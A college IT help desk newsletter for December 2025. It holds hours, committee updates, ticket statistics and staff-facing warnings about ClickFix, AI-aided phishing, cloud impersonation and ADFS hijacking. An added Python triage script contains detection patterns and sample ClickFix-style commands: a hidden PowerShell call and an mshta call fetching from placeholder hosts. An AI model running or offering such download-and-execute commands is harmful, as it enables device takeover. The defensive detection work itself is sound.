News from the ITS Help Desk - December 2025

Help Desk Hours and Location

Contact the ITS Help Desk at 1(805)922-6966 extension 3345 or at helpdesk@hancockcollege.edu
The ITS Help Desk is located in the library on the Santa Maria campus, next to the checkout counter.

Scheduled In-Person Support Hours:
Monday – Thursday: 10:00 AM – 2:00 PM

Outside scheduled hours or Friday: Available by appointment

If emergency assistance is needed, please call the ITS Support Extension at 3345.

ITS will have limited availability between 12/22/25 and 1/5/26. We appreciate your understanding and wish you Happy Holidays!

Updates from Technology Council and Committees

  • Web Services Committee
    • Schedule: Meetings are held bi-monthly, usually on the 1st Thursday, from 9:30-11:00 am.
    • Update: Met and discussed ADA requirements for page banners and other elements for Hancockcollege.edu.
  • Educational Technology Advisory Committee (EdTAC)
    • Schedule: Meetings are held bi-monthly, usually on the 1st and 3rd Tuesday, from 2:30-4:00 pm.
    • No Update
  • Banner Committee
    • Schedule: Meetings are held monthly, usually on the 2nd Monday, from 9:00 - 10:30 am.
    • Update: 12/19/25 Banner Upgrades were implemented successfully.
  • Technology Council
    • Schedule: Meetings are held bi-monthly, usually on the 1st and 3rd Wednesday, from 2:30-4:00 pm.
    • No Update

🔐 2025 Security Concerns in Review

For Faculty and Staff at Allan Hancock College

Cybersecurity threats continue to evolve rapidly. In 2025, attackers are combining old tricks with new technology to make scams more convincing and attacks harder to detect. This article highlights four major areas of concern and offers practical advice on how to stay safe.

1. ClickFix (All Its Varieties)

What it is:
ClickFix is a form of social engineering designed to trick users into believing they are fixing a problem. The attacker presents a convincing message such as “Your account is out of sync,” “Security update required,” or “Click here to resolve this issue.” Instead of fixing anything, the action installs malware or hands control of the device to the attacker.

In 2025, many ClickFix attacks go a step further by asking users to manually run commands — something most faculty and staff would never normally do.

Common ClickFix behaviors now include:

  • Instructions to press Windows + R, paste a command, and click Run

  • Instructions to open Terminal on macOS and paste a command

  • Claims that this step is “required to complete the fix” or “verify your device”

These instructions are a major red flag. Legitimate IT support will not ask you to manually run commands like this.

What to Watch For:

Be especially cautious if you see:

  • A message telling you to:

    • “Press Windows + R”

    • “Open Terminal”

    • “Paste this command exactly”

  • Claims that the command is “safe,” “temporary,” or “required to restore access”

  • Messages that appear urgent or imply consequences if you don’t act immediately

  • Screens that imitate Microsoft, Apple, or a security warning page

Important:
Running commands manually bypasses many built-in security protections. Once run, the attacker may gain full access to the system.

How to Avoid ClickFix Attacks:

✘ Do not run commands unless you are working directly with Allan Hancock College ITS
✘ Do not press Windows + R or open Terminal because a website or email told you to
✔ Close the browser tab immediately if you see instructions like this
✔ Contact ITS if you’re unsure — even if you already clicked something
✔ Remember: real updates and fixes happen automatically or through trusted software

Simple Rule to Remember

If a website or email tells you to open Run or Terminal, it is almost certainly a scam.
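
For ITS staff checking a device after a suspected ClickFix incident: Windows keeps Run-dialog history in the current user's `RunMRU` registry key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`), each entry ending in `\1`. The triage sketch below is an added example, not part of the original newsletter; the indicator patterns and the sample entries are constructed assumptions.

```python
import re

# Indicator name -> pattern. Assumed traits of ClickFix commands, chosen for
# this example; tune them against what is normal in your environment.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)(\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(r"\s-(w(in\w*)?\s+h(id\w*)?|enc\w*)\b", re.I),
    "lure_text": re.compile(r"(captcha|not a robot|verif(y|ication)|human)", re.I),
}

def clean(entry):
    """RunMRU stores each command with a trailing '\\1' marker; drop it."""
    return entry[:-2] if entry.endswith("\\1") else entry

def indicators(command):
    """Names of all indicators that match the command, in sorted order."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))

def triage(entries):
    """Return (command, indicators) for entries that look like ClickFix."""
    flagged = []
    for raw in entries:
        cmd = clean(raw)
        hits = indicators(cmd)
        # An interpreter on its own is ordinary use; require a second trait.
        if "script_host" in hits and len(hits) >= 2:
            flagged.append((cmd, hits))
    return flagged

# Constructed Run-dialog history (not from a real incident). The payload is a
# placeholder and the hostnames use the reserved .invalid suffix.
SAMPLE = [
    "cmd\\1",
    "\\\\fileserver\\shared\\1",
    "notepad C:\\Users\\staff\\notes.txt\\1",
    'powershell -w hidden -c "PLACEHOLDER https://lure.example.invalid/fix"'
    " # I am not a robot - Verification ID 4471\\1",
    "mshta https://update.example.invalid/sync.hta\\1",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(hits, "->", cmd)
```

The trailing "I am not a robot" comment is the part a user sees in the Run box, which is why lure text inside a command is itself treated as an indicator.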

2. AI-Enhanced and Supported Social Engineering

What it is:
Social engineering tricks people into revealing sensitive information. In 2025, attackers are using artificial intelligence (AI) to write highly convincing emails, texts, or voice messages that mimic the writing style and tone of real colleagues or vendors. AI can also generate deepfake voices or video to impersonate a trusted person.

Examples:

  • Emails asking you to “confirm your login details” written in your supervisor’s tone.

  • AI-generated voicemail from a fake “IT Helpdesk.”

Red flags to watch for:

  • Urgent language (“act now!”) or pressure to bypass normal procedures.

  • Requests for credentials, codes, or sharing documents that you didn’t expect.

  • Messages with slight but incorrect details (wrong department name, odd phrasing).

Tips to avoid it:
✔ Always verify unusual requests via a second channel (phone call or in person).
✔ Never send passwords, MFA codes, or sensitive data via email or text.
✔ Report suspicious emails to ITS immediately.
✔ Use MFA (multi-factor authentication) everywhere possible.

3. Cloud Provider Impersonation

What it is:
Attackers impersonate cloud providers (like Microsoft, Google, AWS, or cloud services AHC uses) to trick users into giving up access or sensitive information. This might be done with fake support emails, malicious login pages that look legitimate, or impersonating provider staff.

How it works:

  • A user gets an “alert from your cloud provider” asking to log in to fix an issue.

  • Clicking the link takes them to a fake page that looks real.

  • Login credentials are captured by attackers who then access college resources.

Red flags to watch for:

  • Emails that appear to come from support but contain strange URLs or unusual formatting.

  • Unexpected requests to log in to cloud services outside regular workflows.

  • Messages asking you to confirm account details or permissions.

Tips to avoid it:
✔ Before acting on alerts, hover over links — does the actual URL match what it should be?
✔ When in doubt, go to the cloud provider’s site directly (don’t use the link).
✔ Enable MFA on all cloud accounts.
✔ Use strong passwords that are unique per site.
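
The "hover over links" check above, automated over an HTML message body: compare what each link displays with the host it actually leads to. This is an added example, not part of the original newsletter; the `EXPECTED` domain list and the sample message are assumptions made up for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption for this example: domains the reader expects to sign in on.
EXPECTED = {"office.com", "microsoft.com", "microsoftonline.com", "google.com"}

def real_host(url):
    """Host the browser will actually contact (ignores any user@ prefix)."""
    return (urlsplit(url).hostname or "").lower()

def is_expected(host):
    """True if host is an expected domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in EXPECTED)

class LinkCollector(HTMLParser):
    """Collect (visible text, href) for every <a> in an HTML message."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None

def review_links(html):
    """Return (visible text, real host, verdict) for each link."""
    parser = LinkCollector()
    parser.feed(html)
    out = []
    for text, href in parser.links:
        host = real_host(href)
        out.append((text, host, "ok" if is_expected(host) else "suspicious"))
    return out

# Constructed message body; every non-Microsoft hostname is a made-up example.
SAMPLE = """
<p>Your mailbox is out of sync.</p>
<a href="https://portal.office.com/">Open portal</a>
<a href="https://office.com.login-check.example/auth">https://office.com/signin</a>
<a href="https://office.com@files.example.net/doc">View shared file</a>
"""
```

A link that genuinely starts on a trusted domain and then redirects, as in the ADFS case in section 4, passes this check, so it complements MFA rather than replacing it.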

4. ADFS Hijacking

What it is:
ADFS (Active Directory Federation Services) is a single sign-on system that lets you use one set of credentials across many services (like Office 365). Attackers are finding ways to hijack that trust by using legitimate ADFS redirects to send you to fake login pages that steal credentials or bypass multi-factor authentication. 

How it works:

  • A link looks like it’s from Microsoft (starting with office.com).

  • Because it starts in a trusted domain, traditional filters won’t block it.

  • You log in thinking it’s legitimate, but credentials go to the attacker.

Red flags to watch for:

  • Links that look legitimate but were reached from a search or ad rather than official communication.

  • Login pages outside the usual Microsoft experience.

  • Requests for your password/MFA that arrive unexpectedly.

Tips to avoid it:
✔ Type “portal.office.com” (or your familiar login page) directly rather than clicking.
✔ Use MFA — especially phishing-resistant methods like security keys when available.
✔ Alert ITS if you see unusual login screens or redirects.
✔ Don’t trust login pages that came from search ads.

🛡️ General Security Best Practices for 2025

Here are evergreen tips that protect against all of the threats above:

🧠 Stay vigilant:

  • Think before you click. If a message feels “off,” even slightly — pause.

  • Confirm unusual requests through known channels.

🔐 Strengthen access controls:

  • Use unique passwords and strong MFA (avoid SMS codes when possible).

  • Change passwords regularly and don’t reuse them across systems.

🖥️ Stay current:

  • Keep devices updated. Security patches fix vulnerabilities the attackers exploit.

📣 Report anything suspicious:

November 2025 Ticket Summary

Here’s a brief overview of ITS activity:

Total Tickets (Whole Department)

  • August: 713
  • September: 589
  • October: 593
  • November: 431

Location-less Tickets

240 tickets had no location specified.

Lompoc Valley Campus (LVC) Tickets

22 tickets originated from the Lompoc Valley Campus.

Top 5 Forms Used at LVC:

  1. Something Broke: 9
  2. Service Request: 7
  3. Problem Form: 2
  4. Classroom/Cart Maintenance Request: 1
  5. Install Something: 1

5 Most Common Request Locations:

  1. LVC 1: 9
  2. LVC 5: 5
  3. LVC 2: 4
  4. LVC 3: 4

Only 4 unique buildings submitted ticket requests.

Santa Maria Valley Campus (SM) Tickets

169 tickets originated from the Santa Maria Valley Campus.

Top 5 Forms Used at SM Campus:

  1. Something Broke: 63
  2. Install Something: 11
  3. Audio/Visual Event Request: 9
  4. Service Request: 7
  5. Problem Form: 6

5 Most Common Request Locations:

  1. Building F: 25
  2. Building M: 25
  3. Building L: 20
  4. Building B: 19
  5. Building A: 18

Sources & Acknowledgments

Portions of this article were informed by industry research and analysis from Push Security, a cybersecurity company focused on detecting and preventing modern identity-based attacks, including ClickFix and social-engineering techniques.
Learn more at: Blog | Push Security

Content drafting, synthesis, and audience-focused explanations were assisted by ChatGPT, an AI language model used to help translate complex security topics into clear, faculty- and staff-friendly guidance.